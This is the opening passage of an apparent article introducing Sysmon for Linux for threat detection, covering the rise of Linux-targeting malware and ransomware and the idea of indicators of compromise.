Linux-based systems are the host operating system for cloud hosts, application servers, and a wide variety of internet of things (IoT) devices. Like any other operating system, it is susceptible to attacks. Sysmon for Linux is one of the famous Sysinternals tools available on Linux, improving host-based visibility and making detection and response to threats more efficient.
Introduction
A report from VirusTotal released this year shows a 146% increase in the number of samples targeting Linux systems submitted to the platform [1]. While coinminers affect all operating systems, they make up most of the threats to Linux environments. For example, BlackMatter, HelloKitty ransomware, and REvil are ransomware gangs observed targeting ESXi servers with ELF encryptors [2]. Criminals targeting Linux systems are a fast-growing threat to multi-cloud environments, including data centers. Public and private clouds are valuable targets for cybercriminals and host key components, such as email servers and customer databases. At the same time, it's difficult to determine the exact method of initial access; weak user authentication or web application vulnerabilities are commonly leveraged. After gaining initial access, adversaries usually leverage system utilities, such as curl or wget, to download additional shell scripts from external sources.
The process of locating a malicious program involves identifying clues that indicate the malware's presence on a computer system. We call these clues Indicators of Compromise (IoC) [3]. Network-based detection is commonly the first choice for identifying and monitoring malicious activity. Although it is effective, the data acquired from the network level can....